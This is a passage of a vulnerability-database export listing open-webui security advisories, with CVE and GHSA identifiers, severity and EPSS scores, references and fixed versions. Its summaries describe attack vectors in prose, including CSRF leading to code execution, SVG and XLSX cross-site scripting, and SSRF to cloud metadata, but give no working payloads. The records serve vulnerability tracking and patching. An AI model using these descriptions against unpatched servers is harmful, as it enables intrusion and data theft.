vulnerability VCID-um53-kf7u-kkg6
35
vulnerability VCID-vghe-uuzj-m7cu
36
vulnerability VCID-vkx3-71kv-sugt
37
vulnerability VCID-w2vd-r3hr-w3bt
38
vulnerability VCID-wb88-83cj-ffhy
39
vulnerability VCID-wcz4-vwx4-tufb
40
vulnerability VCID-yug9-shts-kufb
41
vulnerability VCID-yysb-dk2k-f7g4
42
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.6
aliases CVE-2026-28786, GHSA-vvxm-vxmr-624h
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8n6u-wgz9-1bgj
24
url VCID-8nzh-cpda-dkca
vulnerability_id VCID-8nzh-cpda-dkca
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the POST /api/v1/notes/{id}/pin endpoint performs a write operation (toggling the is_pinned field) but only checks for read permission. Users with read-only access to a shared note can pin/unpin it, which is a state-modifying action that should require write permission. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45316
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.01488
published_at 2026-06-14T12:55:00Z
1
value 0.00011
scoring_system epss
scoring_elements 0.01471
published_at 2026-06-11T12:55:00Z
2
value 0.00011
scoring_system epss
scoring_elements 0.0148
published_at 2026-06-13T12:55:00Z
3
value 0.00011
scoring_system epss
scoring_elements 0.01474
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45316
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45316
reference_id
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45316
4
reference_url https://github.com/advisories/GHSA-jx2x-j75f-xq3j
reference_id GHSA-jx2x-j75f-xq3j
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jx2x-j75f-xq3j
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jx2x-j75f-xq3j
reference_id GHSA-jx2x-j75f-xq3j
reference_type
scores
0
value 3.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T15:45:34Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jx2x-j75f-xq3j
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45316, GHSA-jx2x-j75f-xq3j
risk_score 1.6
exploitability 0.5
weighted_severity 3.1
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8nzh-cpda-dkca
25
url VCID-8qvj-xndv-v3ay
vulnerability_id VCID-8qvj-xndv-v3ay
summary A vulnerability in open-webui/open-webui versions <= 0.3.8 allows remote code execution by non-admin users via Cross-Site Request Forgery (CSRF). The application uses cookies with the SameSite attribute set to lax for authentication and lacks CSRF tokens. This allows an attacker to craft a malicious HTML that, when accessed by a victim, can modify the Python code of an existing pipeline and execute arbitrary code with the victim's privileges.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-7806
reference_id
reference_type
scores
0
value 0.00876
scoring_system epss
scoring_elements 0.75815
published_at 2026-06-13T12:55:00Z
1
value 0.00876
scoring_system epss
scoring_elements 0.7581
published_at 2026-06-14T12:55:00Z
2
value 0.00876
scoring_system epss
scoring_elements 0.75731
published_at 2026-06-11T12:55:00Z
3
value 0.00876
scoring_system epss
scoring_elements 0.75802
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-7806
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/blob/1d20c27553f019477f01d7233ebe40b11d31e479/backend/main.py#L892-L920
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/blob/1d20c27553f019477f01d7233ebe40b11d31e479/backend/main.py#L892-L920
3
reference_url https://github.com/open-webui/open-webui/commit/7e253df17593bc12dc5cc89d28703675f05b0158
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/7e253df17593bc12dc5cc89d28703675f05b0158
4
reference_url https://github.com/open-webui/open-webui/pull/6054
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/pull/6054
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-7806
reference_id
reference_type
scores
0
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-7806
6
reference_url https://huntr.com/bounties/9350a68d-5f33-4b3d-988b-81e778160ab8
reference_id 9350a68d-5f33-4b3d-988b-81e778160ab8
reference_type
scores
0
value 8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
1
value 8.0
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2025-03-20T15:21:31Z/
url https://huntr.com/bounties/9350a68d-5f33-4b3d-988b-81e778160ab8
7
reference_url https://github.com/advisories/GHSA-85jc-8h5p-8vw8
reference_id GHSA-85jc-8h5p-8vw8
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-85jc-8h5p-8vw8
fixed_packages
0
url pkg:pypi/open-webui@0.3.33
purl pkg:pypi/open-webui@0.3.33
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1svn-zazq-e3f2
3
vulnerability VCID-1tu1-b9de-nfaa
4
vulnerability VCID-2rs8-62x1-s7h7
5
vulnerability VCID-2xdz-v8cw-fygv
6
vulnerability VCID-32yb-vsfs-43a8
7
vulnerability VCID-3436-znsq-guds
8
vulnerability VCID-4rz6-hw32-jueb
9
vulnerability VCID-4sn4-mrbm-dfgh
10
vulnerability VCID-4v8w-kv6g-kkbc
11
vulnerability VCID-4x63-8x64-d3bq
12
vulnerability VCID-5319-t7jm-y3bx
13
vulnerability VCID-5jna-wvd7-j7cm
14
vulnerability VCID-5wfg-zqcy-c7ar
15
vulnerability VCID-5wzn-mfwg-ybc3
16
vulnerability VCID-66zh-9jk7-9bfx
17
vulnerability VCID-6rbm-rm25-hqgy
18
vulnerability VCID-7j5a-pu4k-kucf
19
vulnerability VCID-7nbc-ng1s-suck
20
vulnerability VCID-8n6u-wgz9-1bgj
21
vulnerability VCID-8nzh-cpda-dkca
22
vulnerability VCID-8y4k-pj2n-8uhm
23
vulnerability VCID-94nj-qkdf-xfhn
24
vulnerability VCID-9jud-sr2a-8yc3
25
vulnerability VCID-9zyk-459z-x3a4
26
vulnerability VCID-chug-ma8r-cucc
27
vulnerability VCID-cw4k-3s8z-uqh8
28
vulnerability VCID-dz6g-jgmg-wqce
29
vulnerability VCID-dzh3-rqx4-fqhv
30
vulnerability VCID-ef1t-pxjm-j7cz
31
vulnerability VCID-gw77-ux3j-qfaa
32
vulnerability VCID-hj5f-yk3y-ffdg
33
vulnerability VCID-jfs9-dps1-27a2
34
vulnerability VCID-jnsg-u9dy-r3d5
35
vulnerability VCID-k17g-bd9g-67f7
36
vulnerability VCID-k9jf-5jzd-pkge
37
vulnerability VCID-mn21-kwuu-w7by
38
vulnerability VCID-n4ma-zcpv-5fbp
39
vulnerability VCID-nxvm-97r4-6ybz
40
vulnerability VCID-pkds-1xgn-q3bv
41
vulnerability VCID-pvep-chj7-ekeg
42
vulnerability VCID-pwsg-72yy-quhk
43
vulnerability VCID-q682-k826-efhv
44
vulnerability VCID-qgfh-7u8n-y7c7
45
vulnerability VCID-qjt1-zxx8-r7ht
46
vulnerability VCID-r7vt-4bqm-f7hb
47
vulnerability VCID-reqw-pfm8-c7g5
48
vulnerability VCID-rhhj-rccv-87hw
49
vulnerability VCID-s625-eg1w-gfd1
50
vulnerability VCID-t571-d65a-cyb2
51
vulnerability VCID-tz2k-gazs-mqgd
52
vulnerability VCID-u25g-p4nx-gqd1
53
vulnerability VCID-ujye-g4rj-8be5
54
vulnerability VCID-um53-kf7u-kkg6
55
vulnerability VCID-vghe-uuzj-m7cu
56
vulnerability VCID-vkx3-71kv-sugt
57
vulnerability VCID-w2vd-r3hr-w3bt
58
vulnerability VCID-wb88-83cj-ffhy
59
vulnerability VCID-wcz4-vwx4-tufb
60
vulnerability VCID-yug9-shts-kufb
61
vulnerability VCID-yysb-dk2k-f7g4
62
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.3.33
aliases CVE-2024-7806, GHSA-85jc-8h5p-8vw8
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8qvj-xndv-v3ay
26
url VCID-8y4k-pj2n-8uhm
vulnerability_id VCID-8y4k-pj2n-8uhm
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the channel webhook create/update flow accepts arbitrary profile_image_url values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves this SVG as image/svg+xml without sanitization, allowing attacker-controlled script handlers (for example onload) to execute when the profile-image URL is opened in the browser. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45314
reference_id
reference_type
scores
0
value 0.0001
scoring_system epss
scoring_elements 0.01267
published_at 2026-06-13T12:55:00Z
1
value 0.0001
scoring_system epss
scoring_elements 0.01271
published_at 2026-06-14T12:55:00Z
2
value 0.0001
scoring_system epss
scoring_elements 0.01264
published_at 2026-06-11T12:55:00Z
3
value 0.0001
scoring_system epss
scoring_elements 0.0126
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45314
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45314
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45314
4
reference_url https://github.com/advisories/GHSA-3856-3vxq-m6fc
reference_id GHSA-3856-3vxq-m6fc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3856-3vxq-m6fc
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc
reference_id GHSA-3856-3vxq-m6fc
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value 7.4
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T19:43:05Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-3856-3vxq-m6fc
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45314, GHSA-3856-3vxq-m6fc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8y4k-pj2n-8uhm
27
url VCID-94nj-qkdf-xfhn
vulnerability_id VCID-94nj-qkdf-xfhn
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-65958
reference_id
reference_type
scores
0
value 0.00053
scoring_system epss
scoring_elements 0.17244
published_at 2026-06-14T12:55:00Z
1
value 0.00053
scoring_system epss
scoring_elements 0.17271
published_at 2026-06-13T12:55:00Z
2
value 0.00053
scoring_system epss
scoring_elements 0.17254
published_at 2026-06-12T12:55:00Z
3
value 0.00053
scoring_system epss
scoring_elements 0.17094
published_at 2026-06-11T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-65958
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774
reference_id 02238d3113e966c353fce18f1b65117380896774
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-08T20:54:23Z/
url https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-65958
reference_id CVE-2025-65958
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-65958
4
reference_url https://github.com/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c6xv-rcvw-v685
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685
reference_id GHSA-c6xv-rcvw-v685
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-08T20:54:23Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685
fixed_packages
0
url pkg:pypi/open-webui@0.6.37
purl pkg:pypi/open-webui@0.6.37
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2rs8-62x1-s7h7
4
vulnerability VCID-2xdz-v8cw-fygv
5
vulnerability VCID-32yb-vsfs-43a8
6
vulnerability VCID-3436-znsq-guds
7
vulnerability VCID-4rz6-hw32-jueb
8
vulnerability VCID-4v8w-kv6g-kkbc
9
vulnerability VCID-4x63-8x64-d3bq
10
vulnerability VCID-5319-t7jm-y3bx
11
vulnerability VCID-5jna-wvd7-j7cm
12
vulnerability VCID-5wfg-zqcy-c7ar
13
vulnerability VCID-5wzn-mfwg-ybc3
14
vulnerability VCID-66zh-9jk7-9bfx
15
vulnerability VCID-6rbm-rm25-hqgy
16
vulnerability VCID-7nbc-ng1s-suck
17
vulnerability VCID-8n6u-wgz9-1bgj
18
vulnerability VCID-8nzh-cpda-dkca
19
vulnerability VCID-8y4k-pj2n-8uhm
20
vulnerability VCID-9jud-sr2a-8yc3
21
vulnerability VCID-chug-ma8r-cucc
22
vulnerability VCID-cw4k-3s8z-uqh8
23
vulnerability VCID-dz6g-jgmg-wqce
24
vulnerability VCID-dzh3-rqx4-fqhv
25
vulnerability VCID-ef1t-pxjm-j7cz
26
vulnerability VCID-hj5f-yk3y-ffdg
27
vulnerability VCID-jfs9-dps1-27a2
28
vulnerability VCID-k9jf-5jzd-pkge
29
vulnerability VCID-n4ma-zcpv-5fbp
30
vulnerability VCID-nxvm-97r4-6ybz
31
vulnerability VCID-pkds-1xgn-q3bv
32
vulnerability VCID-pwsg-72yy-quhk
33
vulnerability VCID-q682-k826-efhv
34
vulnerability VCID-qgfh-7u8n-y7c7
35
vulnerability VCID-qjt1-zxx8-r7ht
36
vulnerability VCID-r7vt-4bqm-f7hb
37
vulnerability VCID-reqw-pfm8-c7g5
38
vulnerability VCID-rhhj-rccv-87hw
39
vulnerability VCID-s625-eg1w-gfd1
40
vulnerability VCID-t571-d65a-cyb2
41
vulnerability VCID-u25g-p4nx-gqd1
42
vulnerability VCID-ujye-g4rj-8be5
43
vulnerability VCID-um53-kf7u-kkg6
44
vulnerability VCID-vghe-uuzj-m7cu
45
vulnerability VCID-vkx3-71kv-sugt
46
vulnerability VCID-w2vd-r3hr-w3bt
47
vulnerability VCID-wb88-83cj-ffhy
48
vulnerability VCID-wcz4-vwx4-tufb
49
vulnerability VCID-yug9-shts-kufb
50
vulnerability VCID-yysb-dk2k-f7g4
51
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.6.37
aliases CVE-2025-65958, GHSA-c6xv-rcvw-v685
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-94nj-qkdf-xfhn
28
url VCID-9jud-sr2a-8yc3
vulnerability_id VCID-9jud-sr2a-8yc3
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, Excel file attachments are previewed in an unsafe way. A crafted XLSX file payload can be used to cause the sheetjs function sheet_to_html to embed an XSS payload into the generated HTML. This is subsequently added to the DOM unsanitized via @html causing the payload to trigger. This vulnerability is fixed in 0.8.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44549
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01606
published_at 2026-06-14T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01593
published_at 2026-06-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01598
published_at 2026-06-13T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01595
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44549
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44549
reference_id
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44549
3
reference_url https://github.com/advisories/GHSA-jwf8-pv5p-vhmc
reference_id GHSA-jwf8-pv5p-vhmc
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jwf8-pv5p-vhmc
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
reference_id GHSA-jwf8-pv5p-vhmc
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-18T12:47:08Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-jwf8-pv5p-vhmc
fixed_packages
0
url pkg:pypi/open-webui@0.8.0
purl pkg:pypi/open-webui@0.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4rz6-hw32-jueb
7
vulnerability VCID-4v8w-kv6g-kkbc
8
vulnerability VCID-4x63-8x64-d3bq
9
vulnerability VCID-5319-t7jm-y3bx
10
vulnerability VCID-5jna-wvd7-j7cm
11
vulnerability VCID-5wfg-zqcy-c7ar
12
vulnerability VCID-5wzn-mfwg-ybc3
13
vulnerability VCID-6rbm-rm25-hqgy
14
vulnerability VCID-7nbc-ng1s-suck
15
vulnerability VCID-8n6u-wgz9-1bgj
16
vulnerability VCID-8nzh-cpda-dkca
17
vulnerability VCID-8y4k-pj2n-8uhm
18
vulnerability VCID-chug-ma8r-cucc
19
vulnerability VCID-cw4k-3s8z-uqh8
20
vulnerability VCID-dz6g-jgmg-wqce
21
vulnerability VCID-dzh3-rqx4-fqhv
22
vulnerability VCID-ef1t-pxjm-j7cz
23
vulnerability VCID-hj5f-yk3y-ffdg
24
vulnerability VCID-jfs9-dps1-27a2
25
vulnerability VCID-k9jf-5jzd-pkge
26
vulnerability VCID-n4ma-zcpv-5fbp
27
vulnerability VCID-nxvm-97r4-6ybz
28
vulnerability VCID-pkds-1xgn-q3bv
29
vulnerability VCID-pwsg-72yy-quhk
30
vulnerability VCID-q682-k826-efhv
31
vulnerability VCID-qgfh-7u8n-y7c7
32
vulnerability VCID-qjt1-zxx8-r7ht
33
vulnerability VCID-r7vt-4bqm-f7hb
34
vulnerability VCID-reqw-pfm8-c7g5
35
vulnerability VCID-rhhj-rccv-87hw
36
vulnerability VCID-s625-eg1w-gfd1
37
vulnerability VCID-t571-d65a-cyb2
38
vulnerability VCID-u25g-p4nx-gqd1
39
vulnerability VCID-ujye-g4rj-8be5
40
vulnerability VCID-um53-kf7u-kkg6
41
vulnerability VCID-vghe-uuzj-m7cu
42
vulnerability VCID-vkx3-71kv-sugt
43
vulnerability VCID-w2vd-r3hr-w3bt
44
vulnerability VCID-wb88-83cj-ffhy
45
vulnerability VCID-wcz4-vwx4-tufb
46
vulnerability VCID-yug9-shts-kufb
47
vulnerability VCID-yysb-dk2k-f7g4
48
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0
aliases CVE-2026-44549, GHSA-jwf8-pv5p-vhmc
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9jud-sr2a-8yc3
29
url VCID-9zyk-459z-x3a4
vulnerability_id VCID-9zyk-459z-x3a4
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.5.7, a user can modify another user's model even if its visibility is set to Private. By changing the access permissions during editing, unauthorized access can be gained. This vulnerability is fixed in 0.5.7.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45345
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09279
published_at 2026-06-12T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09271
published_at 2026-06-14T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09226
published_at 2026-06-11T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09281
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45345
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45345
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45345
3
reference_url https://github.com/advisories/GHSA-gm54-m39w-grjp
reference_id GHSA-gm54-m39w-grjp
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-gm54-m39w-grjp
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-gm54-m39w-grjp
reference_id GHSA-gm54-m39w-grjp
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
1
value MODERATE
